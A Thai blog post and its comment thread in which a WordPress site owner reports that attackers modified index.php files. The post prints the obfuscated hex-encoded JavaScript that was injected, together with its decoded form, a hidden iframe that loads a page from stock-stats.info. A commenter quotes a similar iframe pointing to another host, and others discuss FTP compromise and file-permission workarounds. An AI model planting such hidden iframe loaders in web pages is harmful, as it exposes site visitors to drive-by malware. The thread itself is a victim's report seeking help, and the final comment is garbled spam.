ai siktir vee What do you want? Fuck

วันนี้อัพเดดรูปมิตติ้งสามประตูแต่พอไปดู validate แล้วดันไม่ผ่าน code มันแปลกๆเลย view code ดูก็เลยเห็นของดีที่ไอ้เลวมันเอามาใส่เว็บส้งติงของใครก็ไม่รู้สคริปที่เขียนก็กระจอก ถอดรหัสได้ว่า

document.write('<iframe name=4102e551bb src='
http://stock-stats.info/private_forum/index.php?
'+Math.round(Math.random()*54905)+'4d51752b'">');

stock-stats.info/private_forum/index.php แล้วพอเปิดเข้าไปมันก็บอกว่า ai siktir vee? แปลว่าไรก็ไม่รู้ภาษารัสเซียมั้งครับ ใครรู้ช่วยบอกหน่อยครับว่าแปลว่าไรพอดีเปิดเข้าไปมันบอกว่าแบบนี้น่าจะมีความหมายเดียวกะ Fuck off! มั้งครับพอดีเพื่อนของเพื่อนเค้าแปลให้อิอิ เข้าไปโดนมันหลอกด่าอีกเวงจริงๆ ตอนนี้ก็ไม่รู้มันเข้ามาทางไหนแต่ที่รู้ๆมันไปแก้ไฟล์ /blog/htdocs/wp-content/index.php สคริปที่เอาไปใส่ก็ประมาณนี้ครับ

<script>function v47239c3cdb7ca(v47239c3cdbf95){
 var v47239c3cdc764=16; return(parseInt(v4723
?9c3cdbf95,v47239c3cdc764));}function v47239c3
cdd703(v47239c3cdded4){? var v47239c3cde6a1
?='';for(v47239c3cdee76=0; v47239c3cdee76<v4
7239c3cdded4.length; v47239c3cdee76+=2){ v4
?7239c3cde6a1+=(String.fromCharCode(v47239c3
cdb7ca(v47239c3cdded4.substr(v47239c3cdee76?,
2))));}returnv47239c3cde6a1;}document.write
(v47239c3cdd703('3C5343524950543E77696E646F772
E7374617475733D27446F6E65273B646F63756D65
6E742E777269746528273C696672616D65206E6
16D653D37613061626430306164207372633D5C27
687474703A2F2F73746F636B2D73746174732E69
6E666F2F707269766174655F666F72756D2F696E646
5782E7068703F272B4D6174682E726F756E64
284D6174682E72616E646F6D28292A363531353129
2B27303035396462665C272077696474683D353
133206865696768743D313237207374796C653D5C2
7646973706C61793A206E6F6E655C273E3C2F6
96672616D653E27293C2F5343524950543E'));
</script>3738207374796C653D5C27646973706C617
93A206E6F6E655C273E3C2F696672616D653E2729
3C2F5343524950543E'));</script>

ผมไม่รู้ว่าเข้ามาทางไหนดูที่ server ก็ปกติดูที่ ftp ก็เปงไฟล์ปกติ ดูที่ blog ก็ไม่สามารถแก้ไขไฟล์ผ่าน blog ได้แล้วมันมาจากไหนเข้าไปแก้ไขไฟล์ได้ยังไงใครรู้มาบอกหน่อยครับ แต่ยังไงก็เอาคืนไปแล้วล่ะพรุ่งนี้มันคงมาเอาคืนผมชุดใหญ่แน่เลยอิอิไอ้เว็บนี้ stock-stats.info มันเอาไว้ทำไรว่ะนี่ต้องการทราฟฟิกก็ไม่บอกกันดีๆมาแอบเอา code มาใส่เว็บผมซ่ะงั้นไอ้บ้าเอ้ย นั่งแก้ตั้งนานมันก็ยังไม่หายไล่ดูอีกที่มีอีกไฟล์ /blog/htdocs/index.php งานนี้มันไม่ธรรมดาแล้วล่ะน่าจะมีสคริป php ที่ shell เข้ามาแน่เลย หาก่อนพี่น้องไม่เจอซักทีคราวหน้ามันเล่นผมหนักแน่เลย….

ai siktir vee : What do you want? Fuck

  • นายนู๋

    เราโดนเหมือนกันตั้ม มันเข้าทาง server
    เคยดู log มันมาทาง pro_ftpd กับ vs_ftpd ตอนนี้ก็แก้ไขไม่ได้เลย
    มาบ่อยมากๆ พอมาที ก็ต้องลบที บางวันโดนเป็น 100 เว็บก็แก้ตายเลย

    ตอนนี้วิธีแก้ขัดที่เราใช้ ก็คือ
    เข้า root ssh แล้วใช้ permission chmod 644 ไฟล์เว็บที่โดนทั้งอัพโหลด และแก้ไขไฟล์
    เคยลอง 644 ของ ftp user มันก็มาเขียนทับได้อีก เลยล่อ root เลย มันก็เข้ามานะ แต่เปิดไฟล์เขียนทับไม่ได้
    ข้อเสีย ลูกค้าเข้าแบบ ftp user จะอัพเดทแก้ไฟล์ไม่ได้ เราต้องมา reset owner ให้เป็น owner group ที่ล่ะรายๆไป

    ใครรู้วิธีแก้ไข บอกด้วย

  • ตอนนี้ตั้มกันได้ล่ะ แต่รอดูก่อนซักระยะนึงว่าจะเข้ามาได้อีกเปล่า ของพี่นู๋เป็น blog รึว่าอะไรเหรอ ใช้ wordpress เปล่าของรายละเอียดเว็บที่โดนหน่อย
    ส่วนของตั้มหน่ะแก้ไขไปหลายอย่างล่ะ แต่ไม่รู้มันจะเข้ามาได้อีกอ่ะเปล่ารอดูอีกรอบครับ

  • สงสัยจาโดน Xss

  • Ilia

    Hi! found this page typed in google ‘ai siktir vee?’

    same problem, occured 25 dec 2007:
    =============
    window.status=’Done’;document.write(”)
    =============

    All index.* files on my site were mysteriously modified.

  • Ilia

    uhhhhh…

    document.write(‘<iframe name=c9919e86b659 src=’http://spl.vip-ddos.org/index.php?’+Math.round(Math.random()*9864)+’1a34b75a8c’ ‘>’)

  • Anonymous

    D? sz?p b?t?k! Milyen nyelven ?rtok ti?

  • If reachable, as you on knowledge, would you astuteness updating your blog with more information? It is hellishly beneficial in return me.